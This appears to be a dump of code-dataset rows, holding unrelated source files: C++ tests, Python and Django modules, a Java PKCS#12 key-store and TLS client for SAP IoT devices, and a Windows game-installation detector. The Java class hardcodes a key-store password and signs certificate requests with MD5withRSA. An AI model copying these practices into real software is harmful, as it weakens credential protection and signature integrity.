max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
2,077
/** Copyright (c) 2015-present, Facebook, Inc. All rights reserved. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. */

#include <gtest/gtest.h>
#include <plist/Objects.h>

using plist::Real;
using plist::Integer;
using plist::String;

TEST(Real, Coerce)
{
    /* Strings that are not numeric coerce to null. */
    auto emptyString = String::New("");
    auto fromEmpty = Real::Coerce(emptyString.get());
    EXPECT_EQ(fromEmpty, nullptr);

    auto wordString = String::New("one");
    auto fromWord = Real::Coerce(wordString.get());
    EXPECT_EQ(fromWord, nullptr);

    /* Numeric strings coerce to their real value, with or without a decimal point. */
    auto integerString = String::New("1");
    auto fromIntegerString = Real::Coerce(integerString.get());
    EXPECT_EQ(fromIntegerString->value(), 1.0);

    auto realString = String::New("1.0");
    auto fromRealString = Real::Coerce(realString.get());
    EXPECT_EQ(fromRealString->value(), 1.0);

    /* Integer objects coerce to an equivalent real value. */
    auto integerObject = Integer::New(1);
    auto fromInteger = Real::Coerce(integerObject.get());
    EXPECT_EQ(fromInteger->value(), 1.0);
}
368
746
# Copyright (c) OpenMMLab. All rights reserved.
from mmcv.utils import Registry

from mmdeploy.utils.config_utils import Backend


def __build_backend_wrapper_class(backend: Backend, registry: Registry):
    """Registry build function: resolve the wrapper class registered under
    the backend enum's string value."""
    return registry.module_dict[backend.value]


BACKEND_WRAPPER = Registry('backend', __build_backend_wrapper_class)


def get_backend_wrapper_class(backend: Backend) -> type:
    """Get the backend wrapper class from the registry.

    Args:
        backend (Backend): The backend enum type.

    Returns:
        type: The backend wrapper class
    """
    return BACKEND_WRAPPER.build(backend)


def get_backend_file_count(backend: Backend):
    """Return the number of model files the given backend's wrapper expects,
    as reported by the wrapper class itself."""
    wrapper_class = get_backend_wrapper_class(backend)
    return wrapper_class.get_backend_file_count()
281
301
package com.sap.iot.starterkit.cert;

import java.io.ByteArrayInputStream;
import java.io.Closeable;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.security.GeneralSecurityException;
import java.security.Key;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.KeyStore;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.Principal;
import java.security.Signature;
import java.security.UnrecoverableKeyException;
import java.security.cert.Certificate;
import java.security.cert.CertificateEncodingException;
import java.security.cert.CertificateException;
import java.security.cert.CertificateExpiredException;
import java.security.cert.CertificateFactory;
import java.security.cert.CertificateNotYetValidException;
import java.security.cert.X509Certificate;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.ArrayList;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import javax.net.ssl.KeyManager;
import javax.net.ssl.KeyManagerFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;
import javax.xml.bind.DatatypeConverter;

import com.sap.iot.starterkit.cert.type.Device;

import sun.security.pkcs10.PKCS10;
import sun.security.x509.X500Name;

/**
 * Manages two on-disk PKCS#12 key stores: one general store ("keystore.p12") holding device and
 * device-type certificates, and one SSL store ("keystoreSSL.p12") whose single "private" entry is
 * used for TLS client authentication. Also provides CSR creation, RSA key-pair generation, PEM
 * export, and an SSL socket factory built from the SSL store.
 */
@SuppressWarnings("restriction")
public class KeyStoreClient {

	// Password of the general key store (anonymized placeholder in this copy of the source).
	private static final char[] KEYSTORE_SECRET = "<KEY>".toCharArray();

	// Password of the SSL key store.
	private static final char[] KEYSTORE_SECRET_SSL = "irjcVIEy78nre".toCharArray();

	// Default JDK trust store ("cacerts") used to build the trust manager for outgoing TLS.
	private static final String JDK_TRUSTSTORE_PATH =
		System.getProperty("java.home") + "/lib/security/cacerts";

	// Extracts the value after "deviceId:" from a certificate common-name entry.
	private static final Pattern DEVICEID_PATTERN_SINGLE = Pattern.compile("(deviceId\\:)(.*)");

	// Extracts the value after "tenantId:" from a certificate common-name entry.
	private static final Pattern TENANTID_PATTERN_SINGLE = Pattern.compile("(tenantId\\:)(.*)");

	private KeyStore keyStore;

	private KeyStore keyStoreSSL;

	private String keyStorePath;

	private String keyStorePathSSL;

	/**
	 * Loads (or implicitly creates, if the files do not yet exist) both PKCS#12 key stores from
	 * the class-loader root directory.
	 *
	 * @throws KeyStoreException if either store cannot be loaded
	 */
	public KeyStoreClient() throws KeyStoreException {
		ClassLoader classLoader = KeyStoreClient.class.getClassLoader();
		keyStorePath = classLoader.getResource("").getPath() + "/" + "keystore.p12";
		keyStorePathSSL = classLoader.getResource("").getPath() + "/" + "keystoreSSL.p12";
		keyStore = load("PKCS12", keyStorePath, KEYSTORE_SECRET);
		keyStoreSSL = load("PKCS12", keyStorePathSSL, KEYSTORE_SECRET_SSL);
	}

	/**
	 * Decodes the device type P12 certificate and stores X509 in the key store
	 *
	 * <p>The certificate and its private key are stored under the fixed alias "private" in both
	 * the general and the SSL key store.
	 */
	public void storeDeviceTypeCertificate(String path, String secret, String deviceTypeId)
		throws KeyStoreException {
		char[] secretAsChars = secret.toCharArray();
		// X509 certificate
		Certificate certificate = null;
		// RSA private key
		Key key = null;
		try {
			KeyStore tempKeyStore = load("PKCS12", path, secretAsChars);
			// should be equal to "1" when we decode X509 certificate with native Java
			String alias = "1";
			key = tempKeyStore.getKey(alias, secretAsChars);
			certificate = tempKeyStore.getCertificate(alias);
			storeCertificate(keyStore, KEYSTORE_SECRET, keyStorePath, "private", certificate, key);
			storeCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL, "private",
				certificate, key);
		}
		catch (KeyStoreException | NoSuchAlgorithmException | UnrecoverableKeyException e) {
			throw new KeyStoreException("Unable to get X.509 certificate from P12 file", e);
		}
	}

	/**
	 * Writes the device's private key and certificate as two PEM files
	 * ("&lt;id&gt;-private_key.pem" and "&lt;id&gt;-device_certificate.pem") into the given
	 * folder.
	 */
	public void storeDeviceCertificateAsPEM(Certificate certificate, KeyPair keyPair,
		Device device, String folder) throws KeyStoreException {
		storePrivateKeyAsPEM(keyPair.getPrivate(), folder + device.getId() + "-private_key.pem");
		storeCertificateAsPEM(certificate, folder + device.getId() + "-device_certificate.pem");
	}

	/**
	 * Stores the device certificate under the device id in the general store and installs it as
	 * the "private" entry of the SSL store for TLS client authentication.
	 */
	public void storeDeviceCertificate(Certificate certificate, KeyPair keyPair,
		Device device) throws KeyStoreException {
		storeCertificate(keyStore, KEYSTORE_SECRET, keyStorePath, device.getId(), certificate,
			keyPair.getPrivate());
		setPrivateCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL, certificate,
			keyPair.getPrivate());
	}

	/**
	 * Retrieves device certificate out of the RDMS response (Device JSON object)
	 */
	public Certificate retrieveCertificate(Device device) throws KeyStoreException {
		// The RDMS response carries the certificate as a Base64-encoded DER blob.
		byte[] bytes = DatatypeConverter
			.parseBase64Binary(device.getAuthentication().getX509Certificate());
		ByteArrayInputStream is = new ByteArrayInputStream(bytes);
		Certificate certificate = null;
		try {
			CertificateFactory certificateFactory = CertificateFactory.getInstance("X.509");
			certificate = certificateFactory.generateCertificate(is);
		}
		catch (CertificateException e) {
			throw new KeyStoreException("Unable to get X.509 certificate from RDMS response", e);
		}
		finally {
			closeStream(is);
		}
		return certificate;
	}

	/**
	 * Check for a device certificate in the key store
	 *
	 * <p>Returns true only if a valid key entry exists for the device id AND the certificate's CN
	 * contains a matching "deviceId:" value; on success the certificate is additionally installed
	 * as the SSL store's "private" entry.
	 */
	public boolean checkForDeviceCertificate(Device device) throws KeyStoreException {
		if (keyStore == null || !keyStore.containsAlias(device.getId()) ||
			!keyStore.isKeyEntry(device.getId())) {
			return false;
		}
		X509Certificate deviceCertificate = (X509Certificate) keyStore
			.getCertificate(device.getId());
		Key deviceCertificateKey;
		try {
			deviceCertificateKey = keyStore.getKey(device.getId(), KEYSTORE_SECRET);
		}
		catch (UnrecoverableKeyException | NoSuchAlgorithmException e1) {
			System.err.println("Device certificate private key could not be retrieved.");
			return false;
		}
		try {
			deviceCertificate.checkValidity();
		}
		catch (CertificateExpiredException | CertificateNotYetValidException e) {
			System.err.println("Device certificate expired or not yet valid");
			return false;
		}
		Principal principal = deviceCertificate.getSubjectDN();
		String[] name = getPrincipalAttributeValue(principal, "CN", "");
		String deviceId = extractMatchingValue(name, DEVICEID_PATTERN_SINGLE);
		if (device.getId().equals(deviceId)) {
			// device certificate is in the key store, set it as private for SSL connection
			setPrivateCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL,
				deviceCertificate, deviceCertificateKey);
			return true;
		}
		return false;
	}

	/**
	 * Creates a Certificate Signing Request and signs it with RSA private key
	 *
	 * <p>NOTE(review): the CSR is signed with "MD5withRSA", which is cryptographically broken;
	 * confirm whether the receiving CA still requires it before changing to e.g. SHA256withRSA.
	 */
	public PKCS10 createCSRequest(Device device, KeyPair keyPair, boolean twoCommonNames)
		throws KeyStoreException {
		X500Name x500Name = createX500NameForDevice(device, twoCommonNames);
		PKCS10 request = null;
		try {
			request = new PKCS10(keyPair.getPublic());
			Signature signature = Signature.getInstance("MD5withRSA");
			signature.initSign(keyPair.getPrivate());
			request.encodeAndSign(x500Name, signature);
		}
		catch (Exception e) {
			throw new KeyStoreException("Unable to create CSR request", e);
		}
		return request;
	}

	/**
	 * Generates a PKI (a public and private key for RSA)
	 */
	public KeyPair generateKeyPair() throws KeyStoreException {
		KeyPair keyPair;
		try {
			KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
			generator.initialize(2048);
			keyPair = generator.generateKeyPair();
		}
		catch (NoSuchAlgorithmException e) {
			throw new KeyStoreException("Unable to generate PKI", e);
		}
		return keyPair;
	}

	/**
	 * Builds SSL Socket Factory for HTTP communication
	 *
	 * <p>Client identity comes from the SSL key store; server trust comes from the default JDK
	 * trust store. NOTE(review): this also overrides the process-wide default SSLContext.
	 */
	public SSLSocketFactory buildSSLSocketFactory() throws KeyStoreException {
		SSLContext sslContext = null;
		try {
			KeyManagerFactory keyManagerFactory = KeyManagerFactory
				.getInstance(KeyManagerFactory.getDefaultAlgorithm());
			keyManagerFactory.init(keyStoreSSL, KEYSTORE_SECRET_SSL);
			KeyManager[] keyManagers = keyManagerFactory.getKeyManagers();
			TrustManager[] trustManagers = new TrustManager[] {
				createTrustManagerFromDefaultJDKTrustStore() };
			sslContext = SSLContext.getInstance("TLS");
			sslContext.init(keyManagers, trustManagers, null);
			SSLContext.setDefault(sslContext);
		}
		catch (GeneralSecurityException | IOException e) {
			throw new KeyStoreException("Unable to instantiate SSL context", e);
		}
		return sslContext.getSocketFactory();
	}

	/**
	 * Builds an X509 trust manager from the given trust store, or null if the factory yields no
	 * trust managers.
	 */
	private X509TrustManager createTrustManager(KeyStore truststore)
		throws NoSuchAlgorithmException, KeyStoreException {
		TrustManagerFactory tmfactory = TrustManagerFactory
			.getInstance(TrustManagerFactory.getDefaultAlgorithm());
		tmfactory.init(truststore);
		TrustManager[] trustManagers = tmfactory.getTrustManagers();
		if ((trustManagers != null) && (trustManagers.length > 0)) {
			return (X509TrustManager) trustManagers[0];
		}
		return null;
	}

	/** Builds a trust manager backed by the JDK's bundled "cacerts" store. */
	private X509TrustManager createTrustManagerFromDefaultJDKTrustStore()
		throws IOException, GeneralSecurityException {
		KeyStore jdkTrustStore = load("jks", JDK_TRUSTSTORE_PATH, null);
		return createTrustManager(jdkTrustStore);
	}

	/** Adds a key entry under the given alias and persists the key store to disk. */
	private void storeCertificate(KeyStore keyStore, char[] secret, String keyStorePath,
		String alias, Certificate certificate, Key key) throws KeyStoreException {
		keyStore.setKeyEntry(alias, key, secret, new Certificate[] { certificate });
		store(keyStore, secret, keyStorePath);
	}

	/**
	 * Set given certificate as a private one for SSL connectivity
	 *
	 * <p>NOTE(review): the final reassignment of the {@code keyStore} parameter only rebinds the
	 * local variable; the caller's reference is unchanged. Verify the reload is actually needed.
	 */
	private void setPrivateCertificate(KeyStore keyStore, char[] secret, String keyStorePath,
		Certificate certificate, Key key) throws KeyStoreException {
		String alias = "private";
		keyStore.deleteEntry(alias);
		keyStore.setKeyEntry(alias, key, secret, new Certificate[] { certificate });
		// necessary for the correct TLS-Handshake
		store(keyStore, secret, keyStorePath);
		keyStore = load("PKCS12", keyStorePath, secret);
	}

	/**
	 * Loads a key store of the given type from the given path; a missing or null path yields an
	 * empty, initialized key store.
	 *
	 * <p>NOTE(review): the FileInputStream is never closed after loading — consider
	 * try-with-resources here.
	 */
	private KeyStore load(String type, String path, char[] secret) throws KeyStoreException {
		KeyStore keyStore = KeyStore.getInstance(type);
		InputStream is = null;
		if (path != null) {
			File file = new File(path);
			if (file.exists()) {
				try {
					is = new FileInputStream(file);
				}
				catch (FileNotFoundException e) {
					throw new KeyStoreException("Unable to open P12 key store file", e);
				}
			}
		}
		try {
			// A null stream initializes a new, empty key store.
			keyStore.load(is, secret);
		}
		catch (NoSuchAlgorithmException | CertificateException | IOException e) {
			throw new KeyStoreException("Unable to load a key store from P12 file", e);
		}
		return keyStore;
	}

	/**
	 * Creates a subject name using the device id and other values from the device type certificate
	 */
	private X500Name createX500NameForDevice(Device device, boolean twoCommonNames)
		throws KeyStoreException {
		// The device-type certificate was stored under the fixed alias "private".
		X509Certificate deviceTypeCertificate = (X509Certificate) keyStore
			.getCertificate("private");
		Principal principal = deviceTypeCertificate.getSubjectDN();
		String country = getPrincipalAttributeValue(principal, "C", "DE")[0];
		String organization = getPrincipalAttributeValue(principal, "O", "SAP Trust Community")[0];
		String unit = getPrincipalAttributeValue(principal, "OU", "IoT Services")[0];
		String[] name = getPrincipalAttributeValue(principal, "CN", "");
		String tenantId = extractMatchingValue(name, TENANTID_PATTERN_SINGLE);
		String commonName1 = "deviceId:" + device.getId();
		String commonName2 = "tenantId:" + tenantId;
		String newName = null;
		if (twoCommonNames) {
			// Two separate CN components.
			newName = "CN=" + commonName1 + ",CN=" + commonName2 + ",OU=" + unit + ",O=" +
				organization + ",C=" + country;
		}
		else {
			// Single CN component with a '|' separator between device id and tenant id.
			newName = "CN=" + commonName1 + "|" + commonName2 + ",OU=" + unit + ",O=" +
				organization + ",C=" + country;
		}
		X500Name x500Name = null;
		try {
			x500Name = new X500Name(newName);
		}
		catch (IOException e) {
			throw new KeyStoreException("Unable to create X500 name for a device", e);
		}
		return x500Name;
	}

	/**
	 * Retrieves attributes from a common name or gives back a default value
	 *
	 * <p>Splits the principal's string form on ',' and collects every value whose attribute part
	 * contains the requested name; returns a single-element array with the default if none match.
	 */
	private String[] getPrincipalAttributeValue(Principal principal, String attributeName,
		String defaultValue) {
		ArrayList<String> attributeEntries = new ArrayList<String>();
		String[] principleAttributes = principal.toString().split(",");
		for (String attribute : principleAttributes) {
			if (attribute.contains(attributeName + "=")) {
				attributeEntries.add(attribute.split("=")[1]);
			}
		}
		if (attributeEntries.isEmpty()) {
			return new String[] { defaultValue };
		}
		else {
			return attributeEntries.toArray(new String[attributeEntries.size()]);
		}
	}

	/** Persists the given key store to the given file path. */
	private void store(KeyStore keyStore, char[] secret, String keyStorePath)
		throws KeyStoreException {
		OutputStream os = null;
		try {
			os = new FileOutputStream(keyStorePath);
		}
		catch (FileNotFoundException e) {
			throw new KeyStoreException("Unable to find P12 keystore file", e);
		}
		try {
			keyStore.store(os, secret);
		}
		catch (NoSuchAlgorithmException | CertificateException | IOException e) {
			throw new KeyStoreException("Unable to store the key store into output stream", e);
		}
		finally {
			closeStream(os);
		}
	}

	/** Best-effort close; failures are only logged, never propagated. */
	private void closeStream(Closeable stream) {
		if (stream != null) {
			try {
				stream.close();
			}
			catch (IOException e) {
				System.err.println("Unable to close an I/O stream");
			}
		}
	}

	/**
	 * Returns group 2 of the last element in {@code commonName} matching {@code pattern}, or null
	 * if none match.
	 */
	private String extractMatchingValue(String[] commonName, Pattern pattern) {
		String Id = null;
		for (String element : commonName) {
			Matcher matcher = pattern.matcher(element);
			if (matcher.find()) {
				Id = matcher.group(2);
			}
		}
		return Id;
	}

	/**
	 * Writes the key's PKCS#8 encoding as a Base64 PEM file, wrapped at 64 characters per line.
	 */
	private void storePrivateKeyAsPEM(Key privateKey, String path) throws KeyStoreException {
		try (FileWriter myFW = new FileWriter(path)) {
			myFW.write("-----BEGIN RSA PRIVATE KEY-----");
			myFW.write("\n");
			PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec(
				privateKey.getEncoded());
			myFW.write(DatatypeConverter.printBase64Binary(pkcs8EncodedKeySpec.getEncoded())
				.replaceAll("(.{64})", "$1\n"));
			if ((pkcs8EncodedKeySpec.getEncoded().length % 64) != 0) {
				myFW.write("\n");
			}
			myFW.write("-----END RSA PRIVATE KEY-----");
			myFW.write("\n");
		}
		catch (IOException e) {
			throw new KeyStoreException("Unable to store the private key as PEM File", e);
		}
	}

	/**
	 * Writes the certificate's DER encoding as a Base64 PEM file, wrapped at 64 characters per
	 * line.
	 */
	private void storeCertificateAsPEM(Certificate certificate, String path)
		throws KeyStoreException {
		try (FileWriter myFW = new FileWriter(path)) {
			myFW.write("-----BEGIN CERTIFICATE-----");
			myFW.write("\n");
			myFW.write(DatatypeConverter.printBase64Binary(certificate.getEncoded())
				.replaceAll("(.{64})", "$1\n"));
			if ((certificate.getEncoded().length % 64) != 0) {
				myFW.write("\n");
			}
			myFW.write("-----END CERTIFICATE-----");
			myFW.write("\n");
		}
		catch (IOException | CertificateEncodingException e) {
			throw new KeyStoreException("Unable to store the certificate as PEM File", e);
		}
	}
}
5,002
303
#ifndef LILY_PKG_BUILTIN_H
# define LILY_PKG_BUILTIN_H

/* Forward declarations only; the full definitions live in the interpreter core. */
struct lily_symtab_;
struct lily_import_entry_;

/* Registers the builtin package's symbols into the given symbol table under the
   given import entry. */
void lily_init_builtin_package(struct lily_symtab_ *, struct lily_import_entry_ *);

#endif
88
471
# -*- coding: utf-8 -*-
# Generated by Django 1.11.28 on 2020-04-26 14:24
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):
    """Drop the legacy "SQL" prefix from the custom-data-fields models and let
    Django derive the default table names for the renamed models."""

    dependencies = [
        ('custom_data_fields', '0003_remove_sqlcustomdatafieldsdefinition_couch_id'),
    ]

    operations = [
        # Rename the models themselves.
        migrations.RenameModel(
            old_name='SQLCustomDataFieldsDefinition',
            new_name='CustomDataFieldsDefinition',
        ),
        migrations.RenameModel(
            old_name='SQLField',
            new_name='Field',
        ),
        # table=None resets each model to Django's auto-generated table name
        # (app label + model name), replacing the explicit legacy table names.
        migrations.AlterModelTable(
            name='customdatafieldsdefinition',
            table=None,
        ),
        migrations.AlterModelTable(
            name='field',
            table=None,
        ),
    ]
410
345
#include "pch.h"
#include "App_Misc_GameInstallationDetector.h"
#include "XivAlexanderCommon/Utils_Win32_Process.h"

// Returns the two-letter country attribute of the Authenticode signer of the given
// executable, or an empty string when the file is unsigned or any step fails.
static std::string TestPublisher(const std::filesystem::path& path) {
	// See: https://docs.microsoft.com/en-US/troubleshoot/windows/win32/get-information-authenticode-signed-executables
	constexpr auto ENCODING = X509_ASN_ENCODING | PKCS_7_ASN_ENCODING;

	HCERTSTORE hStore = nullptr;
	HCRYPTMSG hMsg = nullptr;
	DWORD dwEncoding = 0, dwContentType = 0, dwFormatType = 0;
	std::vector<Utils::CallOnDestruction> cleanupList;
	if (!CryptQueryObject(CERT_QUERY_OBJECT_FILE, path.c_str(), CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED, CERT_QUERY_FORMAT_FLAG_BINARY, 0, &dwEncoding, &dwContentType, &dwFormatType, &hStore, &hMsg, nullptr))
		return {};
	if (hMsg) cleanupList.emplace_back([hMsg] { CryptMsgClose(hMsg); });
	if (hStore) cleanupList.emplace_back([hStore] { CertCloseStore(hStore, 0); });

	// Two-pass call: first query the required size, then fetch the signer info.
	DWORD cbData = 0;
	std::vector<uint8_t> signerInfoBuf;
	for (size_t i = 0; i < 2; ++i) {
		if (!CryptMsgGetParam(hMsg, CMSG_SIGNER_INFO_PARAM, 0, signerInfoBuf.empty() ? nullptr : &signerInfoBuf[0], &cbData))
			return {};
		signerInfoBuf.resize(cbData);
	}
	const auto& signerInfo = *reinterpret_cast<CMSG_SIGNER_INFO*>(&signerInfoBuf[0]);

	// Locate the signer's certificate in the embedded store by issuer + serial.
	CERT_INFO certInfo{};
	certInfo.Issuer = signerInfo.Issuer;
	certInfo.SerialNumber = signerInfo.SerialNumber;
	const auto pCertContext = CertFindCertificateInStore(hStore, ENCODING, 0, CERT_FIND_SUBJECT_CERT, &certInfo, nullptr);
	if (!pCertContext)
		return {};
	if (pCertContext) cleanupList.emplace_back([pCertContext] { CertFreeCertificateContext(pCertContext); });

	// Read the C= (country) attribute; the second call writes into the buffer and
	// its return value includes the terminating NUL, hence the "- 1".
	std::wstring country;
	const auto pvTypePara = const_cast<char*>(szOID_COUNTRY_NAME);
	country.resize(CertGetNameStringW(pCertContext, CERT_NAME_ATTR_TYPE, 0, pvTypePara, nullptr, 0));
	country.resize(CertGetNameStringW(pCertContext, CERT_NAME_ATTR_TYPE, 0, pvTypePara, &country[0], static_cast<DWORD>(country.size())) - 1);
	return Utils::ToUtf8(country);
}

// Reads a string value from HKLM, trying the 32-bit registry view first and falling
// back to the 64-bit view when mode == 0 (the default).
static std::wstring ReadRegistryAsString(const wchar_t* lpSubKey, const wchar_t* lpValueName, int mode = 0) {
	if (mode == 0) {
		auto res1 = ReadRegistryAsString(lpSubKey, lpValueName, KEY_WOW64_32KEY);
		if (res1.empty())
			res1 = ReadRegistryAsString(lpSubKey, lpValueName, KEY_WOW64_64KEY);
		return res1;
	}
	HKEY hKey;
	if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, lpSubKey, 0, KEY_READ | mode, &hKey))
		return {};
	Utils::CallOnDestruction c([hKey] { RegCloseKey(hKey); });
	DWORD buflen = 0;
	if (RegQueryValueExW(hKey, lpValueName, nullptr, nullptr, nullptr, &buflen))
		return {};
	std::wstring buf;
	// NOTE(review): buflen from RegQueryValueExW is in bytes, but resize() counts
	// wchar_t elements — this over-allocates; the trailing erase below trims it.
	buf.resize(buflen + 1);
	if (RegQueryValueExW(hKey, lpValueName, nullptr, nullptr, reinterpret_cast<LPBYTE>(&buf[0]), &buflen))
		return {};
	buf.erase(std::ranges::find(buf, L'\0'), buf.end());
	return buf;
}

// Walks upward from deepestLookupPath (or the current process path) until a
// "game/ffxivgame.ver" file is found, then determines the release region from the
// Authenticode signer country of the launcher binaries.
App::Misc::GameInstallationDetector::GameReleaseInfo App::Misc::GameInstallationDetector::GetGameReleaseInfo(std::filesystem::path deepestLookupPath) {
	if (deepestLookupPath.empty())
		deepestLookupPath = Utils::Win32::Process::Current().PathOf();

	// Ascend the directory tree looking for the version file.
	std::filesystem::path gameVersionPath;
	while (!exists(gameVersionPath = deepestLookupPath / "game" / "ffxivgame.ver")) {
		auto parentPath = deepestLookupPath.parent_path();
		if (parentPath == deepestLookupPath)
			throw std::runtime_error("Game installation not found");
		deepestLookupPath = std::move(parentPath);
	}

	GameReleaseInfo result{};
	result.RootPath = std::move(deepestLookupPath);
	result.GameVersion = Utils::Win32::Handle::FromCreateFile(gameVersionPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0).Read<char>(0, 256, Utils::Win32::Handle::PartialIoMode::AllowPartial);

	// Build a filesystem-safe copy of the version string by replacing characters
	// that are invalid in Windows file names (and control characters) with '_'.
	for (auto& chr : result.PathSafeGameVersion = result.GameVersion) {
		for (auto i : "<>:\"/\\|?*") {
			if (chr == i || chr < 32)
				chr = '_';
		}
	}

	// Count signer countries across the boot executables (and the sdo login DLL
	// for the Chinese release).
	std::map<std::string, size_t> publisherCountries;
	for (const auto& [path, filenamePattern] : std::vector<std::pair<std::filesystem::path, std::wregex>>{
		{result.RootPath / L"boot", std::wregex(LR"(^ffxiv.*\.exe$)", std::regex::icase)},
		{result.RootPath / L"sdo", std::wregex(LR"(^sdologinentry\.dll$)", std::regex::icase)},
	}) {
		try {
			for (const auto& item : std::filesystem::directory_iterator(path)) {
				if (!std::regex_search(item.path().filename().wstring(), filenamePattern))
					continue;

				const auto publisherCountry = TestPublisher(item);
				if (!publisherCountry.empty())
					publisherCountries[publisherCountry]++;
			}
		} catch (...) {
			// pass
		}
	}

	if (!publisherCountries.empty()) {
		// NOTE(review): max_element over a std::map compares pairs, so this picks
		// the lexicographically greatest country code, not the most frequent one —
		// confirm whether the vote count was intended to decide ties.
		result.CountryCode = std::ranges::max_element(publisherCountries)->first;
		if (result.CountryCode == "JP") {
			result.Region = Sqex::GameReleaseRegion::International;
			result.BootAppDirectlyInjectable = true;
			// Pick the boot binary matching this process's bitness.
#if INTPTR_MAX == INT32_MAX
			result.BootApp = result.RootPath / L"boot" / L"ffxivboot.exe";
#elif INTPTR_MAX == INT64_MAX
			result.BootApp = result.RootPath / L"boot" / L"ffxivboot64.exe";
#endif
			result.RelatedApps = {
				result.RootPath / L"boot" / L"ffxivboot.exe",
				result.RootPath / L"boot" / L"ffxivboot64.exe",
				result.RootPath / L"boot" / L"ffxivconfig.exe",
				result.RootPath / L"boot" / L"ffxivconfig64.exe",
				result.RootPath / L"boot" / L"ffxivlauncher.exe",
				result.RootPath / L"boot" / L"ffxivlauncher64.exe",
				result.RootPath / L"boot" / L"ffxivupdater.exe",
				result.RootPath / L"boot" / L"ffxivupdater64.exe",
			};
		} else if (result.CountryCode == "CN") {
			result.Region = Sqex::GameReleaseRegion::Chinese;
			result.BootApp = result.RootPath / L"FFXIVBoot.exe";
			result.BootAppRequiresAdmin = true;
			result.BootAppDirectlyInjectable = true;
			result.RelatedApps = {
				result.RootPath / L"LauncherUpdate" / L"LauncherUpdater.exe",
				result.RootPath / L"FFXIVBoot.exe",
				result.RootPath / L"sdo" / L"sdologin" / L"sdologin.exe",
				result.RootPath / L"sdo" / L"sdologin" / L"Launcher.exe",
				result.RootPath / L"sdo" / L"sdologin" / L"sdolplugin.exe",
				result.RootPath / L"sdo" / L"sdologin" / L"update.exe",
			};
		} else if (result.CountryCode == "KR") {
			result.Region = Sqex::GameReleaseRegion::Korean;
			result.BootApp = result.RootPath / L"boot" / L"FFXIV_Boot.exe";
			result.BootAppRequiresAdmin = true;
			result.BootAppDirectlyInjectable = true;
			result.RelatedApps = {
				result.RootPath / L"boot" / L"FFXIV_Boot.exe",
				result.RootPath / L"boot" / L"FFXIV_Launcher.exe",
			};
		} else
			throw std::runtime_error(std::format("{} is unsupported", result.CountryCode));
		return result;
	}

	throw std::runtime_error("Could not determine game region");
}
// Discovers game installations from well-known uninstall/Steam/ff14kr registry
// entries, deduplicates them by root path, and returns them sorted by region,
// version, then path. Entries that fail detection are silently skipped.
std::vector<App::Misc::GameInstallationDetector::GameReleaseInfo> App::Misc::GameInstallationDetector::FindInstallations() {
	std::vector<GameReleaseInfo> result;

	// Official (international) launcher uninstall entry.
	if (const auto reg = ReadRegistryAsString(
		LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE})",
		L"DisplayIcon"
	); !reg.empty()) {
		try {
			result.emplace_back(GetGameReleaseInfo(reg));
		} catch (...) {
			// pass
		}
	}

	// Steam installs: paid edition and free trial have separate app ids.
	for (const auto steamAppId : {
		39210,  // paid
		312060,  // free trial
	}) {
		if (const auto reg = ReadRegistryAsString(std::format(LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Steam App {})", steamAppId).c_str(),
			L"InstallLocation"); !reg.empty()) {
			try {
				result.emplace_back(GetGameReleaseInfo(reg));
			} catch (...) {
				// pass
			}
		}
	}

	// Korean release: recover the install path from the ff14kr:// protocol handler
	// command line (first argument is the executable path).
	if (const auto reg = ReadRegistryAsString(
		LR"(SOFTWARE\Classes\ff14kr\shell\open\command)",
		L""
	); !reg.empty()) {
		try {
			result.emplace_back(GetGameReleaseInfo(Utils::Win32::CommandLineToArgs(reg)[0]));
		} catch (...) {
			// pass
		}
	}

	// Chinese release uninstall entry.
	if (const auto reg = ReadRegistryAsString(
		LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FFXIV)",
		L"DisplayIcon"
	); !reg.empty()) {
		try {
			result.emplace_back(GetGameReleaseInfo(reg));
		} catch (...) {
			// pass
		}
	}

	// Deduplicate by root path, keeping the first occurrence.
	std::set<std::filesystem::path> seen;
	std::erase_if(result, [&seen](const auto& value) { return !seen.insert(value.RootPath).second; });

	// Stable presentation order: region, then version, then path.
	std::ranges::sort(result, [](const auto& l, const auto& r) {
		if (l.Region != r.Region)
			return l.Region < r.Region;
		if (l.GameVersion != r.GameVersion)
			return l.GameVersion< r.GameVersion;
		return l.RootPath < r.RootPath;
	});

	return result;
}
3,392
435
<reponame>amaajemyfren/data { "copyright_text": "Creative Commons Attribution license (reuse allowed)", "description": "In 1979, <NAME> and <NAME> coined the term \u201cPlanning Fallacy\u201d to describe plans and forecasts that are unrealistically close to best-case scenarios. These plans can be improved by consulting the statistics of similar cases. \n\nWhen you look at the software development and projects done using Agile methodologies, you can see the same phenomena. Projects are estimated too optimistically at start. We are usually too focused on best-case scenarios. Although our experience shows that statistically projects are done closer to their worst-case scenario, we stay optimistic. When issues arise, we blame the odd task that took more than expected, or the unexpected technical difficulty that took a few extra weeks or months. But we should have known better, shouldn\u2019t we have?\n\nIn this talk, Amin explains the psychology of estimation and the reasons behind our behaviour. He walks us through the red flags that we can look for to spot Planning Fallacy and describes solutions for estimating more 